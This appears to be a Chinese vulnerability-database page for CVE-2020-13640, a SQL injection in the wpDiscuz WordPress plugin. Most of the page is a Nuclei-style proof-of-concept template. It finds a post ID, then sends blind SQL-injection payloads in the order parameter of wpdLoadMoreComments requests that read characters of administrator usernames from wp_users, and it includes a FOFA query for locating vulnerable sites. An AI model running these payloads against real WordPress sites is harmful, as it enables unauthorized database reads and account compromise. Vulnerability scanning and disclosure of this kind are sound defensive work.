CVE-2020-13640: wpDiscuz <= 5.3.5 - SQL Injection

日期: 2025-08-01 | 影响软件: wpDiscuz | POC: 已公开

漏洞描述

A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.

PoC代码[已公开]

id: CVE-2020-13640

info:
  name: wpDiscuz <= 5.3.5 - SQL Injection
  author: Sourabh-Sahu
  severity: critical
  description: |
    A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
  reference:
    - https://github.com/asterite3/CVE-2020-13640
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13640
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13640
    epss-score: 0.70234
    epss-percentile: 0.98609
    cwe-id: CWE-89
    cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: gvectors
    product: wpdiscuz
    fofa-query: body="/wp-content/plugins/wpdiscuz"
  tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev,vuln

flow: |
  http(1)
  set("postid", iterate(template.postid)[0])
  http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-json/wp/v2/comments HTTP/1.1
        Host: {{Host}}

    stop-at-first-match: true
    extractors:
      - type: regex
        name: postid
        part: body
        group: 1
        regex:
          - 'post"\s*:\s*([0-9]+)'
        internal: true

  - raw:
      - |
        POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
        Host: {{Host}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 96) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - 'comment_list":"<div id=\"wc-comm'
        internal: true

  - raw:
      - |
        POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
        Host: {{Host}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 97) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - '"comment_list":null'
        condition: and
# digest: 4a0a004730450220755868bb3fc54737bba1fd389cd8753fe24999b7b3047b2a6f3e603ea10de0cd022100abb29500906dbe0b1ec3808c2e80de20cb73ab0335deee4de1e69c2dd8c23093:922c64590222798bb761d5b6d8e72950

相关漏洞推荐